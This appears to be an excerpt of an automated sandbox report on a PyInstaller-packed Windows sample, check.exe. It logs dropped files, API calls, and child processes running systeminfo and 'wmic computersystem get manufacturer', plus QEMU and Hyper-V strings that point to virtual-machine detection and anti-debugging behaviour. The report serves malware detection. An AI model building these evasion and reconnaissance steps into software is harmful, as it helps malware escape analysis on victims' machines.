Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI55962\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI41282\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-17331
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeAPI coverage: 4.0 %
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeAPI coverage: 0.3 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6876Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF61E8E83C0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E9280 FindFirstFileExW,FindClose,4_2_00007FF61E8E9280
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E901874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF61E901874
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62E70 memset,PyList_New,SetErrorMode,PyArg_ParseTuple,PyObject_IsTrue,PyEval_SaveThread,GetLogicalDriveStringsA,PyEval_RestoreThread,PyErr_SetFromWindowsErr,SetErrorMode,PyEval_SaveThread,GetDriveTypeA,PyEval_RestoreThread,GetVolumeInformationA,strcat_s,SetLastError,strcat_s,strcat_s,strcat_s,FindFirstVolumeMountPointA,strcpy_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,FindNextVolumeMountPointA,FindVolumeMountPointClose,strcat_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,strchr,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,_Py_Dealloc,_Py_Dealloc,16_2_00007FFB9DD62E70
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD618C0 PyModule_Create2,getenv,RtlGetVersion,GetSystemInfo,InitializeCriticalSection,PyModule_GetState,PyErr_NewException,_Py_Dealloc,PyErr_NewException,PyModule_AddObject,PyErr_NewException,PyModule_AddObject,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,PyModule_AddIntConstant,16_2_00007FFB9DD618C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QfQEMU
Source: check.exe, 00000005.00000003.1846683687.000001DB07D58000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1846083452.000001DB0795B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844275847.000001DB07D58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1846223251.000001DB07ABA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: check.exe, 00000005.00000002.2161247712.00007FFBA0308000.00000008.00000001.01000000.00000024.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8ED12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF61E8ED12C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E903480 GetProcessHeap,4_2_00007FF61E903480
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8ED12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF61E8ED12C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8EC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF61E8EC8A0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8FA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF61E8FA614
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8ED30C SetUnhandledExceptionFilter,4_2_00007FF61E8ED30C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD6A9E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FFB9DD6A9E8
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD6A0C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FFB9DD6A0C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturerJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get manufacturer
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E909570 cpuid 4_2_00007FF61E909570
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5\bin VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5\Qt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI32762\PyQt5 VolumeInformationJump to behavior
